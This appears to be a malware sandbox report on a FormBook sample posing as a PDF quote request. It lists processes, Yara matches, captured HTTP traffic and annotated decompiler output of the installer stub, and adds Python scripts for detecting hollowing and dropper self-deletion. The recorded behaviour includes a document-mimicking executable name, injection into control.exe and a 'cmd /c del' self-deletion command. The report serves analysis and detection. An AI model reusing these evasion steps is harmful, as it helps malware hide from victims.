Timestamp: Apr 8, 2021 13:23:12.111870050 CEST, kBytes transferred: 6617, Direction: IN
Data: HTTP/1.1 200 OK
                                                                      Content-Type: text/html; charset=utf-8
                                                                      x-ua-compatible: IE=edge
                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                      Pragma: no-cache
                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                      Date: Thu, 08 Apr 2021 11:23:12 GMT
                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Oq+MhZLqXn/lPJa2HbfaPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/GeoMerchantPrestoSiteUi/cspreport;worker-src 'self'
                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                      Server: ESF
                                                                      X-XSS-Protection: 0
                                                                      X-Content-Type-Options: nosniff
                                                                      Set-Cookie: NID=213=Q3aVk287agnix_VFlLOZ9f8yZ4NKvZ3Gx5T2uq5mhBEDndQJtvlbSmgVWdWVA_Limzw7UVlmkJM_oISIIEOzBYUYzRN8LDbRdzqogH-Cod8rdzxLYiDXnWMd0mCWh91iRVLe-oo4zLEtKedf1mnoB2xzK3tMk489BX8pYT_Q7Ho; expires=Fri, 08-Oct-2021 11:23:12 GMT; path=/; domain=.google.com; HttpOnly
                                                                      Accept-Ranges: none
                                                                      Vary: Accept-Encoding
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Data Ascii: 8000<!doctype html><html lang="en" dir="ltr" itemscope itemtype="https://schema.org/LocalBusiness"><head><base href="http://business.google.com/"><meta name="referrer" content="origin"><script data-id="_gd" nonce="Oq+MhZLqXn/lPJa2HbfaPg">window.WIZ_global_data = {"DpimGf":false,"E5zAXe":"https://workspace.google.com","EP1ykd":["/_/*","/local/business
Timestamp: Apr 8, 2021 13:23:12.111903906 CEST, kBytes transferred: 6619, Direction: IN
Data Ascii: ","/local/business/*","/posts/l/:listingId","/restaurants","/restaurants/*","/website/_/*","/website/demo","/website/demo/","/website/demo/*"],"FdrFJe":"-5299321465279713427","Im6cmf":"/_/GeoMerchantPrestoSiteUi","LVIXXb":1,"LoQv7e":true,"MT7f
Timestamp: Apr 8, 2021 13:23:12.111923933 CEST, kBytes transferred: 6620, Direction: IN
Data Ascii: toSiteUi","qyaodc":false,"qymVe":"Zbl_KiHz77BwyMK8oC4nRIq4EJ4","rtQCxc":-120,"rvOlFd":"PAGE_SOURCE_UNKNOWN","tHwb2":false,"v9NS6b":"71924320579921992","vVkaEb":"","vXmutd":"%.@.\"CH\",\"ZZ\",\"uSDeCA\\u003d\\u003d\"]\n","w2btAe":"%.@.null,null
Timestamp: Apr 8, 2021 13:23:12.111938953 CEST, kBytes transferred: 6621, Direction: IN
Data Ascii: !1;var e=b.defaultView;if(e&&e.getComputedStyle&&(e=e.getComputedStyle(c),"0px"==e.height||"0px"==e.width||"hidden"==e.visibility&&!g))return!1;if(!c.getBoundingClientRect)return!0;e=c.getBoundingClientRect();c=e.left+a.pageXOffset;g=e.top+a.
Timestamp: Apr 8, 2021 13:23:12.111954927 CEST, kBytes transferred: 6623, Direction: IN
Data Ascii: eight:100%;overflow:hidden;color:#202124;font-family:Roboto,RobotoDraft,Helvetica,Arial,sans-serif;margin:0;text-size-adjust:100%}textarea{font-family:Roboto,RobotoDraft,Helvetica,Arial,sans-serif}a{text-decoration:none;color:#1967d2}img{borde
Timestamp: Apr 8, 2021 13:23:12.112061024 CEST, kBytes transferred: 6624, Direction: IN
Data Ascii: ty:1;pointer-events:auto}.w7WIGb .SVpPcd{transform:translateY(-5px) rotate(-45deg)}.w7WIGb .y5Bz3{opacity:0}.w7WIGb .ihSjwf{transform:translateY(5px) rotate(45deg)}@keyframes quantumWizBoxInkSpread{0%{transform:translate(-50%,-50%) scale(.2)}t
Timestamp: Apr 8, 2021 13:23:12.112117052 CEST, kBytes transferred: 6625, Direction: IN
Data Ascii: Duub a:hover,.e3Duub a:link,.e3Duub a:visited{background:#1a73e8;color:#fff}.HQ8yf,.HQ8yf a{color:#1a73e8}.UxubU,.UxubU a{color:#fff}.ZFr60d{position:absolute;top:0;right:0;bottom:0;left:0;background-color:transparent}.O0WRkf.u3bW4e .ZFr60d{ba
Timestamp: Apr 8, 2021 13:23:12.112144947 CEST, kBytes transferred: 6627, Direction: IN
Data Ascii: -image:radial-gradient(circle farthest-side,rgba(26,115,232,0.161),rgba(26,115,232,0.161) 80%,rgba(26,115,232,0) 100%)}.e3Duub .Vwe4Vb{background-image:radial-gradient(circle farthest-side,rgba(255,255,255,0.322),rgba(255,255,255,0.322) 80%,rg
Timestamp: Apr 8, 2021 13:23:12.112226009 CEST, kBytes transferred: 6628, Direction: IN
Data Ascii: ,0.2,1) ,max-height .2s cubic-bezier(0.0,0.0,0.2,1) ,opacity .05s linear,top .2s cubic-bezier(0.0,0.0,0.2,1)}.JPdR6b.jVwmLb{max-height:56px;opacity:0}.JPdR6b.CAwICe{overflow:hidden}.JPdR6b.oXxKqf{transition:none}.z80M1{color:#222;cursor:point
Timestamp: Apr 8, 2021 13:23:12.112243891 CEST, kBytes transferred: 6630, Direction: IN
Data Ascii: wards;background-image:radial-gradient(circle farthest-side,#bdc1c6,#bdc1c6 80%,rgba(189,193,198,0) 100%);background-size:cover;opacity:1;top:0;left:0}.J0XlZe{color:inherit;line-height:40px;padding:0 6px 0 1em}.a9caSc{color:inherit;direction:l
Timestamp: Apr 8, 2021 13:23:12.124249935 CEST, kBytes transferred: 6631, Direction: IN
Data Ascii: form:scaleX(0)}50%{transform:scaleX(5)}to{transform:scaleX(5) translateX(100%)}}.FKF6mc,.FKF6mc:focus{display:block;outline:none;text-decoration:none}.FKF6mc:visited{fill:inherit;stroke:inherit}.U26fgb.u3bW4e{outline:1px solid transparent}.C0o


                                                                      Code Manipulations

                                                                      Statistics

                                                                      CPU Usage


                                                                      Memory Usage


                                                                      High Level Behavior Distribution


                                                                      Behavior


                                                                      System Behavior

                                                                      General

                                                                      Start time:13:21:19
                                                                      Start date:08/04/2021
                                                                      Path:C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
                                                                      Imagebase:0x7ffabd480000
                                                                      File size:397431 bytes
                                                                      MD5 hash:98F9EA244308BB5969EA3C302C32EFCD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:13:21:20
                                                                      Start date:08/04/2021
                                                                      Path:C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
                                                                      Imagebase:0x7ffabd480000
                                                                      File size:397431 bytes
                                                                      MD5 hash:98F9EA244308BB5969EA3C302C32EFCD
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:13:21:25
                                                                      Start date:08/04/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff6fee60000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:13:21:38
                                                                      Start date:08/04/2021
                                                                      Path:C:\Windows\SysWOW64\control.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\control.exe
                                                                      Imagebase:0xe70000
                                                                      File size:114688 bytes
                                                                      MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      General

                                                                      Start time:13:21:43
                                                                      Start date:08/04/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
                                                                      Imagebase:0x11d0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:13:21:43
                                                                      Start date:08/04/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff724c50000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
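The Yara matches above identify FormBook by memory region rather than by file, and the dotted identifiers encode where in each process the match sits. The following added example (mine, not from the report and not Joe Sandbox tooling) decodes those identifiers under an assumed layout inferred from the values on this page (field 1 = process index in the report, field 4 = 16-hex-digit region base, field 5 = Windows PAGE_* protection; the other fields are not interpreted) and lists which matched regions are executable and which sit at the default 32-bit image base with RWX protection. On this report that singles out the second instance of the sample (index 2), whose region at 0x400000 is RWX in both its start and end dumps, which is what a hollowed image looks like, and shows control.exe (index 7) carrying RWX regions a system binary has no reason to own.

```python
"""Decode the memory-dump identifiers in the Yara match lists of a sandbox report.

Added example; not part of the report and not Joe Sandbox code. Identifier
layout (e.g. 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp)
is an ASSUMPTION inferred from the values on the page:
  field 1 = process index, field 4 = region base (16 hex digits),
  field 5 = PAGE_* protection (winnt.h: 0x04 PAGE_READWRITE, 0x40 PAGE_EXECUTE_READWRITE).
Fields 2, 3 and 6 are matched but not interpreted.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# winnt.h page-protection values (low byte; guard/nocache modifiers sit above it)
PAGE_NAMES = {0x01: "NOACCESS", 0x02: "R", 0x04: "RW", 0x08: "WC",
              0x10: "X", 0x20: "RX", 0x40: "RWX", 0x80: "WCX"}
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80
DEFAULT_IMAGE_BASE = 0x400000   # classic base of a 32-bit PE that was not relocated

# Shortened copies of the Yara match lines from this report (processes 0, 2 and 7).
YARA_LINES = [
    "• Rule: JoeSecurity_FormBook, Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp",
    "• Rule: Formbook_1, Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp",
    "• Rule: Formbook, Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp",
    "• Rule: Formbook, Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp",
    "• Rule: Formbook, Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp",
    "• Rule: Formbook, Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp",
    "• Rule: Formbook, Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp",
    "• Rule: Formbook, Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp",
]

DUMP_ID = re.compile(
    r"([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp"
)


@dataclass(frozen=True, order=True)
class DumpRegion:
    process: int   # report process index (assumed meaning of field 1)
    base: int      # region base address (field 4)
    protect: int   # PAGE_* protection (assumed meaning of field 5)

    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    def prot_str(self) -> str:
        return PAGE_NAMES.get(self.protect & 0xFF, hex(self.protect))


def parse_dump_id(ident: str) -> DumpRegion:
    """Decode one '<...>.sdmp' identifier; raises ValueError on anything else."""
    m = DUMP_ID.search(ident)
    if not m:
        raise ValueError(f"not a dump identifier: {ident!r}")
    return DumpRegion(int(m.group(1), 16), int(m.group(4), 16), int(m.group(5), 16))


def parse_yara_sources(lines):
    """Unique regions named by 'Source:' fields, sorted by (process, base)."""
    regions = set()
    for line in lines:
        m = re.search(r"Source:\s*(\S+\.sdmp)", line)
        if m:
            regions.add(parse_dump_id(m.group(1)))
    return sorted(regions)


def regions_by_process(regions):
    out = defaultdict(list)
    for r in regions:
        out[r.process].append(r)
    return dict(out)


def hollowing_suspects(regions, image_base=DEFAULT_IMAGE_BASE):
    """Regions at the image base with execute+write protection.

    A normally mapped PE has read-only headers at its base and an execute-read
    .text; PAGE_EXECUTE_READWRITE at the base means the original mapping was
    replaced or re-protected, which is the process-hollowing footprint."""
    return [r for r in regions if r.base == image_base and (r.protect & 0xFF) == 0x40]


if __name__ == "__main__":
    regs = parse_yara_sources(YARA_LINES)
    for proc, items in regions_by_process(regs).items():
        print(f"process {proc}: " + ", ".join(f"0x{r.base:X} {r.prot_str()}" for r in items))
    print("hollowing suspects:", [(r.process, hex(r.base)) for r in hollowing_suspects(regs)])
```

Only the address and protection fields are decoded; the page documents nothing about the remaining fields, so the code carries them through without assigning them a meaning.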

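The process list above records the whole chain in order of start time: the sample starts a second copy of itself, FormBook code then shows up in a SysWOW64 control.exe that was started with the bare image path as its command line, and a cmd.exe deletes the original file. The added example below (mine, not the report's) turns those observations into detection logic over Sysmon-style process-creation events constructed from the table. The images, command lines and Wow64 flags are the report's; the PIDs and parent links are an assumption, because the table lists processes, not a tree, and the `del` command line is written with the double quotes cmd.exe actually receives where the report renders single quotes.

```python
"""Detection logic derived from a sandbox report's process list.

Added example; not part of the report and not Joe Sandbox code. The events
below are CONSTRUCTED from the System Behavior table; PIDs and parent links
are an ASSUMPTION, everything else is taken from the table.
"""
import re
from dataclasses import dataclass

SAMPLE = r"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe"


@dataclass(frozen=True)
class ProcEvent:
    pid: int        # assumed
    ppid: int       # assumed
    image: str
    cmdline: str
    wow64: bool     # the table's "Wow64 process (32bit)" column


EVENTS = [
    ProcEvent(1, 0, SAMPLE, f'"{SAMPLE}"', True),
    ProcEvent(2, 1, SAMPLE, f'"{SAMPLE}"', True),          # second copy of the sample
    ProcEvent(3, 0, r"C:\Windows\explorer.exe", "", False),
    ProcEvent(7, 3, r"C:\Windows\SysWOW64\control.exe",
              r"C:\Windows\SysWOW64\control.exe", True),
    ProcEvent(8, 7, r"C:\Windows\SysWOW64\cmd.exe", f'/c del "{SAMPLE}"', True),
    ProcEvent(9, 8, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", False),
]

# A document-looking name that really ends in .exe ("x,pdf.exe", "invoice.doc.exe").
LURE_NAME = re.compile(r"(?i)[,._ -](pdf|docx?|xlsx?|jpe?g)\.exe$")
# "del <path>" with optional quoting around the path.
DEL_CMD = re.compile(r"""(?i)\bdel\s+["']?(?P<path>[^"']+?)["']?\s*$""")


def _norm(path: str) -> str:
    return path.strip().lower()       # Windows paths compare case-insensitively


def find_self_spawn(events):
    """PIDs whose parent runs the same image: a dropper starting a second copy
    of itself, the usual target of process hollowing."""
    by_pid = {e.pid: e for e in events}
    return [e.pid for e in events
            if e.ppid in by_pid and _norm(by_pid[e.ppid].image) == _norm(e.image)]


def find_dropper_deletion(events):
    """(cmd.exe pid, image) pairs where cmd.exe deletes the image of a process
    seen in the same session: the payload cleaning up its dropper."""
    seen = {_norm(e.image): e.image for e in events}
    hits = []
    for e in events:
        if not _norm(e.image).endswith("\\cmd.exe"):
            continue
        m = DEL_CMD.search(e.cmdline)
        if m and _norm(m.group("path")) in seen:
            hits.append((e.pid, seen[_norm(m.group("path"))]))
    return hits


def find_bare_wow64_children(events):
    """32-bit children of a 64-bit parent whose command line is nothing but
    the image path. Heuristic (assumption): malware that picks a system
    binary as an injection host launches it exactly like this."""
    by_pid = {e.pid: e for e in events}
    out = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent and not parent.wow64 and e.wow64 and _norm(e.cmdline) == _norm(e.image):
            out.append(e.pid)
    return out


def find_lure_names(events):
    """PIDs whose file name mimics a document, as 'isu-isu,pdf.exe' does."""
    return [e.pid for e in events if LURE_NAME.search(e.image.rsplit("\\", 1)[-1])]


def triage(events):
    return {
        "self_spawn": find_self_spawn(events),
        "dropper_deleted_by": find_dropper_deletion(events),
        "bare_wow64_children": find_bare_wow64_children(events),
        "lure_names": find_lure_names(events),
    }


if __name__ == "__main__":
    for key, value in triage(EVENTS).items():
        print(f"{key}: {value}")
```

Each rule on its own is noisy (installers start copies of themselves, 32-bit helpers get launched by explorer.exe); the value is in the combination within one process tree, which is why `triage` returns all four findings together rather than alerting on any single one.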
                                                                      Disassembly

                                                                      Code Analysis


                                                                        Executed Functions

                                                                        C-Code - Quality: 86%
                                                                        (Decompiler output of the sample's entry point. The "NSIS Error", "~nsu.tmp\", "Au_.exe" and " _?=" strings and the handling of the /S, /NCRC and /D= switches identify it as the generic NSIS installer stub that wraps the sample; the FormBook code itself is not in this stub but in the memory regions listed under the Yara matches above.)
                                                                        			_entry_() {
                                                                        				struct _SHFILEINFOA _v356;
                                                                        				long _v372;
                                                                        				char _v380;
                                                                        				int _v396;
                                                                        				CHAR* _v400;
                                                                        				signed int _v404;
                                                                        				signed int _v408;
                                                                        				char _v416;
                                                                        				intOrPtr _v424;
                                                                        				intOrPtr _t31;
                                                                        				void* _t36;
                                                                        				CHAR* _t41;
                                                                        				signed int _t43;
                                                                        				CHAR* _t46;
                                                                        				signed int _t48;
                                                                        				int _t52;
                                                                        				signed int _t56;
                                                                        				void* _t78;
                                                                        				CHAR* _t89;
                                                                        				signed int _t90;
                                                                        				void* _t91;
                                                                        				CHAR* _t96;
                                                                        				signed int _t97;
                                                                        				signed int _t99;
                                                                        				signed char* _t103;
                                                                        				CHAR* _t105;
                                                                        				signed int _t106;
                                                                        				void* _t108;
                                                                        
                                                                        				_t99 = 0;
                                                                        				_v372 = 0;
                                                                        				_t105 = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                        				_v380 = 0x20;
                                                                        				__imp__#17();
                                                                        				__imp__OleInitialize(0); // executed
                                                                        				 *0x7a3030 = _t31;
                                                                        				SHGetFileInfoA(0x79e540, 0,  &_v356, 0x160, 0); // executed
                                                                        				E004059BF(0x7a2780, "NSIS Error");
                                                                        				_t89 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                                        				GetTempPathA(0x400, _t89);
                                                                        				_t36 = E00403116(_t108);
                                                                        				_t109 = _t36;
                                                                        				if(_t36 != 0) {
                                                                        					L2:
                                                                        					_t96 = "\"C:\\Users\\jones\\Desktop\\RFQ_AP65425652_032421 isu-isu,pdf.exe\" ";
                                                                        					DeleteFileA(_t96); // executed
                                                                        					E004059BF(_t96, GetCommandLineA());
                                                                        					 *0x7a2f80 = GetModuleHandleA(0);
                                                                        					_t41 = _t96;
                                                                        					if("\"C:\\Users\\jones\\Desktop\\RFQ_AP65425652_032421 isu-isu,pdf.exe\" " == 0x22) { // decompiler shows the buffer's runtime content; the test is: first char of the command line == '"'
                                                                        						_v404 = 0x22;
                                                                        						_t41 =  &M007A9001;
                                                                        					}
                                                                        					_t43 = CharNextA(E004054F7(_t41, _v404));
                                                                        					_v408 = _t43;
                                                                        					while(1) {
                                                                        						_t91 =  *_t43;
                                                                        						_t112 = _t91;
                                                                        						if(_t91 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t91 - 0x20;
                                                                        						if(_t91 != 0x20) {
                                                                        							L7:
                                                                        							__eflags =  *_t43 - 0x22;
                                                                        							_v404 = 0x20;
                                                                        							if( *_t43 == 0x22) {
                                                                        								_t43 = _t43 + 1;
                                                                        								__eflags = _t43;
                                                                        								_v404 = 0x22;
                                                                        							}
                                                                        							__eflags =  *_t43 - 0x2f;
                                                                        							if( *_t43 != 0x2f) {
                                                                        								L17:
                                                                        								_t43 = E004054F7(_t43, _v404);
                                                                        								__eflags =  *_t43 - 0x22;
                                                                        								if(__eflags == 0) {
                                                                        									_t43 = _t43 + 1;
                                                                        									__eflags = _t43;
                                                                        								}
                                                                        								continue;
                                                                        							} else {
                                                                        								_t43 = _t43 + 1;
                                                                        								__eflags =  *_t43 - 0x53;
                                                                        								if( *_t43 == 0x53) { // 'S': the /S switch (silent install) sets flag 2
                                                                        									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
                                                                        									if(( *(_t43 + 1) | 0x00000020) == 0x20) {
                                                                        										_t99 = _t99 | 0x00000002;
                                                                        										__eflags = _t99;
                                                                        									}
                                                                        								}
                                                                        								__eflags =  *_t43 - 0x4352434e; // 0x4352434e is "NCRC" in little-endian ASCII: the /NCRC switch (skip the CRC check) sets flag 4
                                                                        								if( *_t43 == 0x4352434e) {
                                                                        									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
                                                                        									if(( *(_t43 + 4) | 0x00000020) == 0x20) {
                                                                        										_t99 = _t99 | 0x00000004;
                                                                        										__eflags = _t99;
                                                                        									}
                                                                        								}
                                                                        								__eflags =  *(_t43 - 2) - 0x3d442f20; // 0x3d442f20 is " /D=": install-directory override; the argument is copied into the install-directory buffer below (decompiler shows that buffer with its runtime content)
                                                                        								if( *(_t43 - 2) == 0x3d442f20) {
                                                                        									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000;
                                                                        									__eflags = _t43 + 2;
                                                                        									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t43 + 2);
                                                                        									L22:
                                                                        									_t46 = E00402C37(_t112, _t99); // executed
                                                                        									_t105 = _t46;
                                                                        									if(_t105 != 0) {
                                                                        										L32:
                                                                        										E00403501();
                                                                        										__imp__OleUninitialize();
                                                                        										if(_t105 == 0) {
                                                                        											__eflags =  *0x7a3014;
                                                                        											if( *0x7a3014 != 0) {
                                                                        												_t106 = E00405CD2("ADVAPI32.dll", "OpenProcessToken");
                                                                        												_t97 = E00405CD2("ADVAPI32.dll", "LookupPrivilegeValueA");
                                                                        												_t90 = E00405CD2("ADVAPI32.dll", "AdjustTokenPrivileges");
                                                                        												__eflags = _t106;
                                                                        												if(_t106 != 0) {
                                                                        													__eflags = _t97;
                                                                        													if(_t97 != 0) {
                                                                        														__eflags = _t90;
                                                                        														if(_t90 != 0) {
                                                                        															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400); // OpenProcessToken(self, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY (0x28), &hToken)
                                                                        															__eflags = _t56;
                                                                        															if(_t56 != 0) {
                                                                        																 *_t97(0, "SeShutdownPrivilege",  &_v400); // LookupPrivilegeValueA(NULL, SE_SHUTDOWN_NAME, &tp.Privileges[0].Luid)
                                                                        																_v416 = 1; // tp.PrivilegeCount = 1
                                                                        																_v404 = 2; // tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED
                                                                        																 *_t90(_v424, 0,  &_v416, 0, 0, 0); // AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL)
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        												_t52 = ExitWindowsEx(2, 0); // EWX_REBOOT: reached only when the installer script requested a reboot (the flag at 0x7a3014)
                                                                        												__eflags = _t52;
                                                                        												if(_t52 == 0) {
                                                                        													E00401410(9);
                                                                        												}
                                                                        											}
                                                                        											_t48 =  *0x7a302c;
                                                                        											__eflags = _t48 - 0xffffffff;
                                                                        											if(_t48 != 0xffffffff) {
                                                                        												_v396 = _t48;
                                                                        											}
                                                                        											ExitProcess(_v396);
                                                                        										}
                                                                        										E004052BF(_t105, 0x200010);
                                                                        										ExitProcess(2);
                                                                        									}
                                                                        									if( *0x7a2f94 == _t46) {
                                                                        										L31:
                                                                        										 *0x7a302c =  *0x7a302c | 0xffffffff;
                                                                        										_v396 = E00403526();
                                                                        										goto L32;
                                                                        									}
                                                                        									_t103 = E004054F7(_t96, _t46);
                                                                        									while(_t103 >= _t96) {
                                                                        										__eflags =  *_t103 - 0x3d3f5f20; // 0x3d3f5f20 is " _?=": marks a copy already relaunched from the temp dir (NSIS uninstaller convention); if found, run in place
                                                                        										if(__eflags == 0) {
                                                                        											break;
                                                                        										}
                                                                        										_t103 = _t103 - 1;
                                                                        										__eflags = _t103;
                                                                        									}
                                                                        									_t116 = _t103 - _t96;
                                                                        									_t105 = "Error launching installer";
                                                                        									if(_t103 < _t96) { // no " _?=" on the command line: copy self to %TEMP%\~nsu.tmp\Au_.exe and relaunch from there
                                                                        										lstrcatA(_t89, "~nsu.tmp\\");
                                                                        										CreateDirectoryA(_t89, 0);
                                                                        										_v404 = _v404 & 0x00000000;
                                                                        										do {
                                                                        											 *0x79d940 = 0x22;
                                                                        											lstrcatA(0x79d940, _t89);
                                                                        											lstrcatA(0x79d940, "Au_.exe");
                                                                        											DeleteFileA(0x79d941);
                                                                        											if(_t105 == 0) {
                                                                        												goto L43;
                                                                        											}
                                                                        											if(lstrcmpiA(GetModuleFileNameA( *0x7a2f80, 0x79e140, 0x400) + 0x79e13a,  &M004091A1) == 0) {
                                                                        												goto L32;
